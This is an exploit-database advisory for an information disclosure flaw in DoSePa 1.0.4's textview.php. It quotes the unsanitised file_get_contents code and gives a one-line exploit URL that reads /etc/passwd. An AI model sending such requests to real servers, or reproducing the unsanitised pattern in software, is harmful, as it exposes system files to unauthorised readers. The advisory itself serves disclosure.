[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

DoSePa 1.0.4 (textview.php) Information Disclosure Vulnerability

Author
Craig Heffner
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1172
Category
web applications
Date add
17-11-2006
Platform
unsorted
================================================================
DoSePa 1.0.4 (textview.php) Information Disclosure Vulnerability
================================================================



#######################################################################################
# Target:
#
#       DoSePa 1.0.4 (textview.php)
#
# Vulnerability:
#
#       Information disclosure.
#
# Description:
#
#       The textview.php page in DoSePa does not properly sanitize the $_GET['file']
#       value; this allows an attacker to view any file to which the server has
#       read rights.
#
# Vulnerable Code (truncated):
#
#       $file=$_GET['file'];
#       file_get_contents($file);
#
# Exploit:
#
#       http://dosepa.somesite.com/textview.php?file=/etc/passwd
#
# Discovery:
#
#       Craig Heffner
#######################################################################################




#  0day.today [2024-12-25]  #